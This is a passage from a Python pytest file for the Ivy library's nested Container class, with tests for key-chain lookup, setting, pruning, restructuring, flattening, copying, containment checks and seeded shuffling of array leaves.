                "d": np.array([[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]]),
            },
        }
    )
    # before conversion every leaf is a raw numpy array
    originals = (
        container["a"], container.a,
        container["b"]["c"], container.b.c,
        container["b"]["d"], container.b.d,
    )
    for leaf in originals:
        assert isinstance(leaf, np.ndarray)
    # after conversion every leaf is an ivy array
    container_from_numpy = container.from_numpy()
    converted = (
        container_from_numpy["a"], container_from_numpy.a,
        container_from_numpy["b"]["c"], container_from_numpy.b.c,
        container_from_numpy["b"]["d"], container_from_numpy.b.d,
    )
    for leaf in converted:
        assert ivy.is_ivy_array(leaf)
def test_container_arrays_as_lists(device, call):
    """Test that arrays_as_lists converts every array leaf into a list."""
    container = Container(
        {
            "a": ivy.array(
                [[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]], device=device
            ),
            "b": {
                "c": ivy.array(
                    [[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]], device=device
                ),
                "d": ivy.array(
                    [[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]], device=device
                ),
            },
        }
    )
    # every leaf starts out as an ivy array
    originals = (
        container["a"], container.a,
        container["b"]["c"], container.b.c,
        container["b"]["d"], container.b.d,
    )
    for leaf in originals:
        assert ivy.is_ivy_array(leaf)
    # without key_chains specification
    container_arrays_as_lists = container.arrays_as_lists()
    converted = (
        container_arrays_as_lists["a"], container_arrays_as_lists.a,
        container_arrays_as_lists["b"]["c"], container_arrays_as_lists.b.c,
        container_arrays_as_lists["b"]["d"], container_arrays_as_lists.b.d,
    )
    for leaf in converted:
        assert isinstance(leaf, list)
def test_container_has_key(device, call):
    """Test that has_key finds a key at any nesting depth."""
    container = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
        }
    )
    # present keys, including nested ones
    for present in ("a", "b", "c", "d"):
        assert container.has_key(present)  # noqa
    # absent keys
    for absent in ("e", "f"):
        assert not container.has_key(absent)  # noqa
def test_container_has_key_chain(device, call):
    """Test that has_key_chain matches only full '/'-separated paths."""
    container = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
        }
    )
    # valid chains from the root
    for chain in ("a", "b", "b/c", "b/d"):
        assert container.has_key_chain(chain)
    # invalid chains: missing leaf, and a nested key queried from the root
    for chain in ("b/e", "c"):
        assert not container.has_key_chain(chain)
def test_container_has_nans(device, call):
    """Test ``Container.has_nans`` in global and leafwise modes, with and
    without counting infinities as NaNs (``include_infs``).  Leafwise mode
    returns a container of per-leaf booleans instead of a single bool.
    """
    container = Container(
        {
            "a": ivy.array([1.0, 2.0], device=device),
            "b": {
                "c": ivy.array([2.0, 3.0], device=device),
                "d": ivy.array([3.0, 4.0], device=device),
            },
        }
    )
    container_nan = Container(
        {
            "a": ivy.array([1.0, 2.0], device=device),
            "b": {
                "c": ivy.array([float("nan"), 3.0], device=device),
                "d": ivy.array([3.0, 4.0], device=device),
            },
        }
    )
    container_inf = Container(
        {
            "a": ivy.array([1.0, 2.0], device=device),
            "b": {
                "c": ivy.array([2.0, 3.0], device=device),
                "d": ivy.array([3.0, float("inf")], device=device),
            },
        }
    )
    container_nan_n_inf = Container(
        {
            "a": ivy.array([1.0, 2.0], device=device),
            "b": {
                "c": ivy.array([float("nan"), 3.0], device=device),
                "d": ivy.array([3.0, float("inf")], device=device),
            },
        }
    )
    # global
    # with inf check
    assert not container.has_nans()
    assert container_nan.has_nans()
    assert container_inf.has_nans()
    assert container_nan_n_inf.has_nans()
    # without inf check
    assert not container.has_nans(include_infs=False)
    assert container_nan.has_nans(include_infs=False)
    assert not container_inf.has_nans(include_infs=False)
    assert container_nan_n_inf.has_nans(include_infs=False)
    # leafwise
    # with inf check
    container_hn = container.has_nans(leafwise=True)
    assert container_hn.a is False
    assert container_hn.b.c is False
    assert container_hn.b.d is False
    container_nan_hn = container_nan.has_nans(leafwise=True)
    assert container_nan_hn.a is False
    assert container_nan_hn.b.c is True
    assert container_nan_hn.b.d is False
    container_inf_hn = container_inf.has_nans(leafwise=True)
    assert container_inf_hn.a is False
    assert container_inf_hn.b.c is False
    assert container_inf_hn.b.d is True
    container_nan_n_inf_hn = container_nan_n_inf.has_nans(leafwise=True)
    assert container_nan_n_inf_hn.a is False
    assert container_nan_n_inf_hn.b.c is True
    assert container_nan_n_inf_hn.b.d is True
    # without inf check
    container_hn = container.has_nans(leafwise=True, include_infs=False)
    assert container_hn.a is False
    assert container_hn.b.c is False
    assert container_hn.b.d is False
    container_nan_hn = container_nan.has_nans(leafwise=True, include_infs=False)
    assert container_nan_hn.a is False
    assert container_nan_hn.b.c is True
    assert container_nan_hn.b.d is False
    container_inf_hn = container_inf.has_nans(leafwise=True, include_infs=False)
    assert container_inf_hn.a is False
    assert container_inf_hn.b.c is False
    assert container_inf_hn.b.d is False
    container_nan_n_inf_hn = container_nan_n_inf.has_nans(
        leafwise=True, include_infs=False
    )
    assert container_nan_n_inf_hn.a is False
    assert container_nan_n_inf_hn.b.c is True
    assert container_nan_n_inf_hn.b.d is False
def test_container_at_keys(device, call):
    """Test that at_keys retains only the requested keys, at any depth."""
    container = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
        }
    )
    # keys given as a list, spanning different depths
    selected = container.at_keys(["a", "c"])
    assert np.allclose(ivy.to_numpy(selected["a"]), np.array([1]))
    assert np.allclose(ivy.to_numpy(selected["b"]["c"]), np.array([2]))
    assert "d" not in selected["b"]
    # a single key given as a bare string
    selected = container.at_keys("c")
    assert "a" not in selected
    assert np.allclose(ivy.to_numpy(selected["b"]["c"]), np.array([2]))
    assert "d" not in selected["b"]
    # selecting a branch key keeps its whole subtree
    selected = container.at_keys(["b"])
    assert "a" not in selected
    assert np.allclose(ivy.to_numpy(selected["b"]["c"]), np.array([2]))
    assert np.allclose(ivy.to_numpy(selected["b"]["d"]), np.array([3]))
def test_container_at_key_chain(device, call):
    """Test at_key_chain and the equivalent __getitem__ chain lookup."""
    container = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
        }
    )
    # explicit method call: branch lookup, then leaf lookup
    branch = container.at_key_chain("b")
    assert np.allclose(ivy.to_numpy(branch["c"]), np.array([2]))
    leaf = container.at_key_chain("b/c")
    assert np.allclose(ivy.to_numpy(leaf), np.array([2]))
    # the overridden __getitem__ accepts the same chains
    branch = container["b"]
    assert np.allclose(ivy.to_numpy(branch["c"]), np.array([2]))
    leaf = container["b/c"]
    assert np.allclose(ivy.to_numpy(leaf), np.array([2]))
def test_container_at_key_chains(device, call):
    """at_key_chains selects sub-trees by full slash-separated chains."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    # selection described by a boolean target container
    picked = cont.at_key_chains(Container({"a": True, "b": {"c": True}}))
    assert np.allclose(ivy.to_numpy(picked["a"]), np.array([1]))
    assert np.allclose(ivy.to_numpy(picked["b"]["c"]), np.array([2]))
    assert "d" not in picked["b"]
    # selection by a list of chains
    picked = cont.at_key_chains(["b/c", "b/d"])
    assert "a" not in picked
    assert np.allclose(ivy.to_numpy(picked["b"]["c"]), np.array([2]))
    assert np.allclose(ivy.to_numpy(picked["b"]["d"]), np.array([3]))
    # selection by a single chain string
    picked = cont.at_key_chains("b/c")
    assert "a" not in picked
    assert np.allclose(ivy.to_numpy(picked["b"]["c"]), np.array([2]))
    assert "d" not in picked["b"]
@pytest.mark.parametrize("include_empty", [True, False])
def test_container_all_key_chains(include_empty, device, call):
    """all_key_chains enumerates leaf key chains in depth-first key order."""
    if include_empty:
        leaves = [Container(), Container(), Container()]
    else:
        leaves = [ivy.array([i], device=device) for i in [1, 2, 3]]
    cont = Container({"a": leaves[0], "b": {"c": leaves[1], "d": leaves[2]}})
    kcs = cont.all_key_chains(include_empty)
    assert kcs[0] == "a"
    assert kcs[1] == "b/c"
    assert kcs[2] == "b/d"
@pytest.mark.parametrize("include_empty", [True, False])
def test_container_key_chains_containing(include_empty, device, call):
    """key_chains_containing finds chains whose leaf key holds a substring."""
    if include_empty:
        a_val, bc_val, bd_val = Container(), Container(), Container()
    else:
        a_val = ivy.array([1], device=device)
        bc_val = ivy.array([2], device=device)
        bd_val = ivy.array([3], device=device)
    cont = Container({"a_sub": a_val, "b": {"c": bc_val, "d_sub": bd_val}})
    kcs = cont.key_chains_containing("sub", include_empty)
    assert kcs[0] == "a_sub"
    assert kcs[1] == "b/d_sub"
# noinspection PyUnresolvedReferences
def test_container_set_at_keys(device, call):
    """set_at_keys overwrites values wherever the given keys appear."""
    base = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    work = base.copy()
    # replacing a branch key replaces the entire sub-container
    cont = work.set_at_keys({"b": ivy.array([4], device=device)})
    assert np.allclose(ivy.to_numpy(cont["a"]), np.array([1]))
    assert np.allclose(ivy.to_numpy(cont["b"]), np.array([4]))
    assert not cont.has_key("c")  # noqa
    assert not cont.has_key("d")  # noqa
    # replacing leaves by key, at top level and nested
    cont = work.set_at_keys(
        {"a": ivy.array([5], device=device), "c": ivy.array([6], device=device)}
    )
    assert np.allclose(ivy.to_numpy(cont["a"]), np.array([5]))
    assert np.allclose(ivy.to_numpy(cont["b"]["c"]), np.array([6]))
    assert np.allclose(ivy.to_numpy(cont["b"]["d"]), np.array([3]))
# noinspection PyUnresolvedReferences
def test_container_set_at_key_chain(device, call):
    """set_at_key_chain (and item assignment) create nested entries."""
    base = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )

    def _check(cont_in, expected):
        # every (key-chain, value) pair must be present and numerically equal
        for chain, val in expected.items():
            assert np.allclose(ivy.to_numpy(cont_in[chain]), np.array(val))

    # explicit method calls
    cont = base.copy()
    cont = cont.set_at_key_chain("b/e", ivy.array([4], device=device))
    _check(cont, {"a": [1], "b/c": [2], "b/d": [3], "b/e": [4]})
    cont = cont.set_at_key_chain("f", ivy.array([5], device=device))
    _check(cont, {"a": [1], "b/c": [2], "b/d": [3], "b/e": [4], "f": [5]})
    # overridden __setitem__ with chain syntax
    cont = base.copy()
    assert "b/e" not in cont
    cont["b/e"] = ivy.array([4], device=device)
    _check(cont, {"a": [1], "b/c": [2], "b/d": [3], "b/e": [4]})
    assert "f" not in cont
    cont["f"] = ivy.array([5], device=device)
    _check(cont, {"a": [1], "b/c": [2], "b/d": [3], "b/e": [4], "f": [5]})
# noinspection PyUnresolvedReferences
def test_container_overwrite_at_key_chain(device, call):
    """overwrite_at_key_chain only replaces existing leaves.

    Writing to a key chain that does not yet exist must raise, unlike
    set_at_key_chain which would create it.
    """
    container_orig = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    container = container_orig.copy()
    # "b/e" does not exist, so overwriting it is an error; pytest.raises
    # also fails the test if no exception is raised, unlike the previous
    # hand-rolled try/except flag
    with pytest.raises(Exception):
        container.overwrite_at_key_chain("b/e", ivy.array([4], device=device))
    # overwriting an existing chain succeeds and leaves siblings untouched
    container = container.overwrite_at_key_chain("b/d", ivy.array([4], device=device))
    assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
    assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
    assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([4]))
def test_container_set_at_key_chains(device, call):
    """set_at_key_chains writes values from a target container, out of place."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    # overwrite two chains at once
    target = Container(
        {"a": ivy.array([4], device=device), "b": {"d": ivy.array([5], device=device)}}
    )
    result = cont.set_at_key_chains(target, inplace=False)
    assert np.allclose(ivy.to_numpy(result["a"]), np.array([4]))
    assert np.allclose(ivy.to_numpy(result["b"]["c"]), np.array([2]))
    assert np.allclose(ivy.to_numpy(result["b"]["d"]), np.array([5]))
    # inplace=False leaves the source container untouched
    result = cont.set_at_key_chains(
        Container({"b": {"c": ivy.array([7], device=device)}}), inplace=False
    )
    assert np.allclose(ivy.to_numpy(result["a"]), np.array([1]))
    assert np.allclose(ivy.to_numpy(result["b"]["c"]), np.array([7]))
    assert np.allclose(ivy.to_numpy(result["b"]["d"]), np.array([3]))
def test_container_overwrite_at_key_chains(device, call):
    """overwrite_at_key_chains replaces existing leaves out of place.

    Chains absent from the source container must raise rather than be
    created (creation is set_at_key_chains' job).
    """
    container = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    target_container = Container(
        {"a": ivy.array([4], device=device), "b": {"d": ivy.array([5], device=device)}}
    )
    new_container = container.overwrite_at_key_chains(target_container, inplace=False)
    assert np.allclose(ivy.to_numpy(new_container["a"]), np.array([4]))
    assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
    assert np.allclose(ivy.to_numpy(new_container["b"]["d"]), np.array([5]))
    target_container = Container({"b": {"c": ivy.array([7], device=device)}})
    new_container = container.overwrite_at_key_chains(target_container, inplace=False)
    assert np.allclose(ivy.to_numpy(new_container["a"]), np.array([1]))
    assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([7]))
    assert np.allclose(ivy.to_numpy(new_container["b"]["d"]), np.array([3]))
    # "b/e" does not exist in the container, so this must raise; pytest.raises
    # also fails the test if no exception is raised, unlike the previous
    # hand-rolled try/except flag
    with pytest.raises(Exception):
        container.overwrite_at_key_chains(
            Container({"b": {"e": ivy.array([5], device=device)}})
        )
def test_container_prune_keys(device, call):
    """prune_keys removes the named keys wherever they occur in the tree."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )

    def _attr_raises(cont_in, chain):
        # attribute access along the pruned chain must raise AttributeError
        try:
            node = cont_in
            for key in chain.split("/"):
                node = getattr(node, key)
            return False
        except AttributeError:
            return True

    pruned = cont.prune_keys(["a", "c"])
    assert "a" not in pruned
    assert np.allclose(ivy.to_numpy(pruned["b"]["d"]), np.array([[3]]))
    assert np.allclose(ivy.to_numpy(pruned.b.d), np.array([[3]]))
    assert "c" not in pruned["b"]
    assert _attr_raises(pruned, "a")
    assert _attr_raises(pruned, "b/c")
    pruned = cont.prune_keys(["a", "d"])
    assert "a" not in pruned
    assert np.allclose(ivy.to_numpy(pruned["b"]["c"]), np.array([[2]]))
    assert np.allclose(ivy.to_numpy(pruned.b.c), np.array([[2]]))
    assert "d" not in pruned["b"]
    assert _attr_raises(pruned, "a")
    assert _attr_raises(pruned, "b/d")
def test_container_prune_key_chain(device, call):
    """prune_key_chain removes a single chain, or a whole branch."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {"c": ivy.array([2], device=device), "d": None},
        }
    )

    def _attr_raises(cont_in, chain):
        # attribute access along the pruned chain must raise AttributeError
        try:
            node = cont_in
            for key in chain.split("/"):
                node = getattr(node, key)
            return False
        except AttributeError:
            return True

    # prune a leaf chain; the sibling None entry survives
    pruned = cont.prune_key_chain("b/c")
    assert np.allclose(ivy.to_numpy(pruned["a"]), np.array([[1]]))
    assert np.allclose(ivy.to_numpy(pruned.a), np.array([[1]]))
    assert pruned["b"]["d"] is None
    assert pruned.b.d is None
    assert "c" not in pruned["b"].keys()
    assert _attr_raises(pruned, "b/c")
    # prune an entire branch
    pruned = cont.prune_key_chain("b")
    assert np.allclose(ivy.to_numpy(pruned["a"]), np.array([[1]]))
    assert np.allclose(ivy.to_numpy(pruned.a), np.array([[1]]))
    assert "b" not in pruned.keys()
    assert _attr_raises(pruned, "b")
def test_container_prune_key_chains(device, call):
    """prune_key_chains removes multiple chains given as list or container."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )

    def _attr_raises(cont_in, chain):
        # attribute access along the pruned chain must raise AttributeError
        try:
            node = cont_in
            for key in chain.split("/"):
                node = getattr(node, key)
            return False
        except AttributeError:
            return True

    def _check(pruned):
        assert "a" not in pruned
        assert np.allclose(ivy.to_numpy(pruned["b"]["d"]), np.array([[3]]))
        assert np.allclose(ivy.to_numpy(pruned.b.d), np.array([[3]]))
        assert "c" not in pruned["b"]
        assert _attr_raises(pruned, "a")
        assert _attr_raises(pruned, "b/c")

    # chains given as a list
    _check(cont.prune_key_chains(["a", "b/c"]))
    # chains given as a boolean target container
    _check(cont.prune_key_chains(Container({"a": True, "b": {"c": True}})))
def test_container_format_key_chains(device, call):
    """format_key_chains maps a formatting function over every key."""
    cont = Container(
        {
            "_a": ivy.array([1], device=device),
            "b ": {
                "c": ivy.array([2], device=device),
                "d-": ivy.array([3], device=device),
            },
        }
    )
    # strip underscores, spaces and dashes from every key
    table = str.maketrans("", "", "_ -")
    formatted = cont.format_key_chains(lambda s: s.translate(table))
    for chain, expected in [("a", 1), ("b/c", 2), ("b/d", 3)]:
        assert np.allclose(ivy.to_numpy(formatted[chain]), np.array([expected]))
    assert np.allclose(ivy.to_numpy(formatted.a), np.array([1]))
    assert np.allclose(ivy.to_numpy(formatted.b.c), np.array([2]))
    assert np.allclose(ivy.to_numpy(formatted.b.d), np.array([3]))
def test_container_sort_by_key(device, call):
    """sort_by_key orders keys alphabetically at every nesting level."""
    cont = Container(
        {
            "b": ivy.array([1], device=device),
            "a": {
                "d": ivy.array([2], device=device),
                "c": ivy.array([3], device=device),
            },
        }
    )
    cont_sorted = cont.sort_by_key()
    assert all(k == t for k, t in zip(cont_sorted.keys(), ["a", "b"]))
    assert all(k == t for k, t in zip(cont_sorted.a.keys(), ["c", "d"]))
def test_container_prune_empty(device, call):
    """prune_empty drops entries whose value is an empty mapping."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {"c": {}, "d": ivy.array([3], device=device)},
        }
    )
    pruned = cont.prune_empty()
    assert np.allclose(ivy.to_numpy(pruned["a"]), np.array([[1]]))
    assert np.allclose(ivy.to_numpy(pruned.a), np.array([[1]]))
    assert np.allclose(ivy.to_numpy(pruned["b"]["d"]), np.array([[3]]))
    assert np.allclose(ivy.to_numpy(pruned.b.d), np.array([[3]]))
    assert "c" not in pruned["b"]
    # attribute access to the removed entry must now raise
    try:
        _ = pruned.b.c
        raised = False
    except AttributeError:
        raised = True
    assert raised
def test_container_prune_key_from_key_chains(device, call):
    """prune_key_from_key_chains splices the named key out of each chain."""
    cont = Container(
        {
            "Ayy": ivy.array([1], device=device),
            "Bee": {
                "Cee": ivy.array([2], device=device),
                "Dee": ivy.array([3], device=device),
            },
            "Beh": {
                "Ceh": ivy.array([4], device=device),
                "Deh": ivy.array([5], device=device),
            },
        }
    )
    # absolute key name: children of "Bee" are hoisted one level up
    pruned = cont.prune_key_from_key_chains("Bee")
    for key, val in [("Ayy", 1), ("Cee", 2), ("Dee", 3)]:
        assert np.allclose(ivy.to_numpy(pruned[key]), np.array([[val]]))
        assert np.allclose(ivy.to_numpy(getattr(pruned, key)), np.array([[val]]))
    assert "Bee" not in pruned
    # every key containing the substring is pruned
    pruned = cont.prune_key_from_key_chains(containing="B")
    for key, val in [("Ayy", 1), ("Cee", 2), ("Dee", 3), ("Ceh", 4), ("Deh", 5)]:
        assert np.allclose(ivy.to_numpy(pruned[key]), np.array([[val]]))
        assert np.allclose(ivy.to_numpy(getattr(pruned, key)), np.array([[val]]))
    assert "Bee" not in pruned
    assert "Beh" not in pruned
def test_container_prune_keys_from_key_chains(device, call):
    """prune_keys_from_key_chains splices several keys out of each chain."""
    cont = Container(
        {
            "Ayy": ivy.array([1], device=device),
            "Bee": {
                "Cee": ivy.array([2], device=device),
                "Dee": ivy.array([3], device=device),
            },
            "Eee": {"Fff": ivy.array([4], device=device)},
        }
    )

    def _check(pruned):
        # children of the pruned keys are hoisted one level up
        for key, val in [("Ayy", 1), ("Cee", 2), ("Dee", 3), ("Fff", 4)]:
            assert np.allclose(ivy.to_numpy(pruned[key]), np.array([[val]]))
            assert np.allclose(ivy.to_numpy(getattr(pruned, key)), np.array([[val]]))
        assert "Bee" not in pruned
        assert "Eee" not in pruned

    # absolute key names
    _check(cont.prune_keys_from_key_chains(["Bee", "Eee"]))
    # keys containing the given substrings
    _check(cont.prune_keys_from_key_chains(containing=["B", "E"]))
def test_container_restructure_key_chains(device, call):
    """restructure_key_chains renames chains per an old->new mapping."""

    def _fresh_cont():
        return Container(
            {
                "a": ivy.array([1], device=device),
                "b": {
                    "c": ivy.array([2], device=device),
                    "d": ivy.array([3], device=device),
                },
            }
        )

    def _check(cont_in, mapping):
        # mapping: chain -> expected scalar; verify item and attribute access
        for chain, val in mapping.items():
            assert np.allclose(ivy.to_numpy(cont_in[chain]), np.array([[val]]))
            node = cont_in
            for key in chain.split("/"):
                node = getattr(node, key)
            assert np.allclose(ivy.to_numpy(node), np.array([[val]]))

    # rename a single chain, leaving the others in place
    restructured = _fresh_cont().restructure_key_chains({"a": "A"})
    _check(restructured, {"A": 1, "b/c": 2, "b/d": 3})
    # rename every chain
    restructured = _fresh_cont().restructure_key_chains(
        {"a": "A", "b/c": "B/C", "b/d": "B/D"}
    )
    _check(restructured, {"A": 1, "B/C": 2, "B/D": 3})
def test_container_restructure(device, call):
    """Restructure remaps key chains and reshapes each leaf in one go.

    Each spec entry names the new key chain and gives a rearrange
    pattern (einops-style strings — presumably applied via einops;
    confirm), with optional axes_lengths for patterns that unpack an
    axis. keep_orig=False drops the original entries from the result.
    """
    container = Container(
        {
            "a": ivy.array([[1, 2], [3, 4]], device=device),
            "b": {
                "c": ivy.array([[2, 4], [6, 8]], device=device),
                "d": ivy.array([3, 6, 9, 12], device=device),
            },
        }
    )
    container_restructured = container.restructure(
        {
            # transpose the 2x2 array
            "a": {"key_chain": "A", "pattern": "a b -> b a"},
            # flatten the 2x2 array to length 4
            "b/c": {"key_chain": "B/C", "pattern": "a b -> (a b)"},
            # unflatten the length-4 vector back to 2x2
            "b/d": {
                "key_chain": "B/D",
                "pattern": "(a b) -> a b",
                "axes_lengths": {"a": 2, "b": 2},
            },
        },
        keep_orig=False,
    )
    assert np.allclose(
        ivy.to_numpy(container_restructured["A"]), np.array([[1, 3], [2, 4]])
    )
    assert np.allclose(
        ivy.to_numpy(container_restructured.A), np.array([[1, 3], [2, 4]])
    )
    assert np.allclose(
        ivy.to_numpy(container_restructured["B/C"]), np.array([2, 4, 6, 8])
    )
    assert np.allclose(ivy.to_numpy(container_restructured.B.C), np.array([2, 4, 6, 8]))
    assert np.allclose(
        ivy.to_numpy(container_restructured["B/D"]), np.array([[3, 6], [9, 12]])
    )
    assert np.allclose(
        ivy.to_numpy(container_restructured.B.D), np.array([[3, 6], [9, 12]])
    )
def test_container_flatten_key_chains(device, call):
    """flatten_key_chains joins nested keys with '__', within depth limits."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": {"d": ivy.array([2], device=device)},
                "e": {"f": {"g": ivy.array([3], device=device)}},
            },
        }
    )

    def _check(cont_in, chain, expected):
        # verify both item access and chained attribute access
        assert np.allclose(ivy.to_numpy(cont_in[chain]), np.array([[expected]]))
        node = cont_in
        for key in chain.split("/"):
            node = getattr(node, key)
        assert np.allclose(ivy.to_numpy(node), np.array([[expected]]))

    # fully flattened
    flat = cont.flatten_key_chains()
    _check(flat, "a", 1)
    _check(flat, "b__c__d", 2)
    _check(flat, "b__e__f__g", 3)
    # keep the bottom level intact
    flat = cont.flatten_key_chains(above_height=1)
    _check(flat, "a", 1)
    _check(flat, "b__c/d", 2)
    _check(flat, "b__e__f/g", 3)
    # keep the top level intact
    flat = cont.flatten_key_chains(below_depth=1)
    _check(flat, "a", 1)
    _check(flat, "b/c__d", 2)
    _check(flat, "b/e__f__g", 3)
    # keep both extremes intact
    flat = cont.flatten_key_chains(above_height=1, below_depth=1)
    _check(flat, "a", 1)
    _check(flat, "b/c/d", 2)
    _check(flat, "b/e__f/g", 3)
def test_container_deep_copy(device, call):
    """deep_copy duplicates leaves: equal numerically, distinct objects."""
    cont = Container(
        {
            "a": ivy.array([0.0], device=device),
            "b": {
                "c": ivy.array([1.0], device=device),
                "d": ivy.array([2.0], device=device),
            },
        }
    )
    copied = cont.deep_copy()
    for original_leaf, copied_leaf in [
        (cont.a, copied.a),
        (cont.b.c, copied.b.c),
        (cont.b.d, copied.b.d),
    ]:
        assert np.allclose(ivy.to_numpy(original_leaf), ivy.to_numpy(copied_leaf))
        assert id(original_leaf) != id(copied_leaf)
def test_container_contains(device, call):
    """Test ``in`` plus the sub-container and sub-structure predicates.

    The asserts below demonstrate that:
    * ``in`` accepts top-level keys and slash-separated key chains, but
      not bare nested keys;
    * contains_sub_container requires the candidate's values to be
      present (a same-shape container with different values fails);
    * contains_sub_structure compares layout only, so different values
      still match;
    * partial=True lets the candidate cover just part of the tree.
    """
    arr0 = ivy.array([0.0], device=device)
    arr1 = ivy.array([1.0], device=device)
    arr2 = ivy.array([2.0], device=device)
    sub_cont = Container({"c": arr1, "d": arr2})
    container = Container({"a": arr0, "b": sub_cont})
    # keys and key chains
    assert "a" in container
    assert "b" in container
    assert "c" not in container
    assert "b/c" in container
    assert "d" not in container
    assert "b/d" in container
    # sub-container (values must match)
    assert container.contains_sub_container(container)
    assert container.contains_sub_container(sub_cont)
    assert sub_cont in container
    # partial sub-container
    partial_sub_cont = Container({"b": {"d": arr2}})
    assert container.contains_sub_container(container, partial=True)
    assert container.contains_sub_container(partial_sub_cont, partial=True)
    assert not partial_sub_cont.contains_sub_container(container, partial=True)
    # sub-structure (same layout, different values)
    sub_struc = Container(
        {"c": ivy.array([3.0], device=device), "d": ivy.array([4.0], device=device)}
    )
    assert not container.contains_sub_container(sub_struc)
    assert sub_struc not in container
    assert container.contains_sub_structure(sub_struc)
    assert container.contains_sub_structure(container)
    # partial sub-structure
    partial_sub_struc = Container({"b": {"d": ivy.array([4.0], device=device)}})
    assert container.contains_sub_structure(container, partial=True)
    assert container.contains_sub_structure(partial_sub_struc, partial=True)
    assert not partial_sub_struc.contains_sub_structure(container, partial=True)
def test_container_shuffle(device, call):
    """Shuffle leaf arrays with a shared seed so they stay aligned.

    Each section re-seeds the global RNG and recomputes the expected
    shuffled reference data, so the exact order of the seed/shuffle
    calls below matters — do not reorder.
    """
    if call is helpers.tf_graph_call:
        # tf.random.set_seed is not compiled. The shuffle is then not
        # aligned between container items.
        pytest.skip()
    dict_in = {
        "a": ivy.array([1, 2, 3], device=device),
        "b": {
            "c": ivy.array([1, 2, 3], device=device),
            "d": ivy.array([1, 2, 3], device=device),
        },
    }
    container = Container(dict_in)
    # without key_chains specification: every leaf is shuffled
    container_shuffled = container.shuffle(0)
    data = ivy.array([1, 2, 3], device=device)
    ivy.functional.ivy.random.seed()
    shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
    assert (ivy.to_numpy(container_shuffled["a"]) == shuffled_data).all()
    assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
    assert (ivy.to_numpy(container_shuffled["b"]["c"]) == shuffled_data).all()
    assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
    assert (ivy.to_numpy(container_shuffled["b"]["d"]) == shuffled_data).all()
    assert (ivy.to_numpy(container_shuffled.b.d) == shuffled_data).all()
    # with key_chains to apply: unlisted leaves stay in original order
    container_shuffled = container.shuffle(0, ["a", "b/c"])
    data = ivy.array([1, 2, 3], device=device)
    ivy.functional.ivy.random.seed()
    shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
    assert (ivy.to_numpy(container_shuffled["a"]) == shuffled_data).all()
    assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
    assert (ivy.to_numpy(container_shuffled["b"]["c"]) == shuffled_data).all()
    assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
    assert (ivy.to_numpy(container_shuffled["b"]["d"]) == ivy.to_numpy(data)).all()
    assert (ivy.to_numpy(container_shuffled.b.d) == ivy.to_numpy(data)).all()
    # with key_chains to apply pruned: unlisted leaves are dropped
    container_shuffled = container.shuffle(0, ["a", "b/c"], prune_unapplied=True)
    data = ivy.array([1, 2, 3], device=device)
    ivy.functional.ivy.random.seed()
    shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
    assert (ivy.to_numpy(container_shuffled["a"]) == shuffled_data).all()
    assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
    assert (ivy.to_numpy(container_shuffled["b"]["c"]) == shuffled_data).all()
    assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
    assert "b/d" not in container_shuffled
    # with key_chains to not apply: listed leaves stay in original order
    container_shuffled = container.shuffle(
        0, Container({"a": None, "b": {"d": None}}), to_apply=False
    )
    data = ivy.array([1, 2, 3], device=device)
    ivy.functional.ivy.random.seed()
    shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
    assert (ivy.to_numpy(container_shuffled["a"]) == ivy.to_numpy(data)).all()
    assert (ivy.to_numpy(container_shuffled.a) == ivy.to_numpy(data)).all()
    assert (ivy.to_numpy(container_shuffled["b"]["c"]) == shuffled_data).all()
    assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
